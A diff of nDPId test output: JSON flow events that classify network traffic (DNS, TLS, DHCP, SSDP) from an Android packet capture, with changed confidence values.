+00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00674{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":200000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} +00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871827,"flow_last_seen":1582454871827,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1582454867151,"flow_last_seen":1582454867312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":715,"flow_tot_l4_payload_len":918,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"17.253.53.201","src_port":58338,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866407,"flow_last_seen":1582454866538,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454869361,"flow_last_seen":1582454869363,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39008,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454792980,"flow_last_seen":1582454853081,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1530,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866448,"flow_last_seen":1582454868606,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868597,"flow_last_seen":1582454868597,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":51430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871496,"flow_last_seen":1582454871536,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":22850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00823{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1582454867688,"flow_last_seen":1582454868211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5497,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871042,"flow_last_seen":1582454871531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6624,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1582454871069,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5325,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1582454871075,"flow_last_seen":1582454871428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454865802,"flow_last_seen":1582454866026,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454871152,"flow_last_seen":1582454871906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":363,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871321,"flow_last_seen":1582454871375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3562,"flow_avg_l4_payload_len":254,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454871623,"flow_last_seen":1582454871978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":6380,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454871839,"flow_last_seen":1582454872035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4381,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":33014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871823,"flow_last_seen":1582454871824,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":10677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871804,"flow_last_seen":1582454871805,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":18379,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"}} 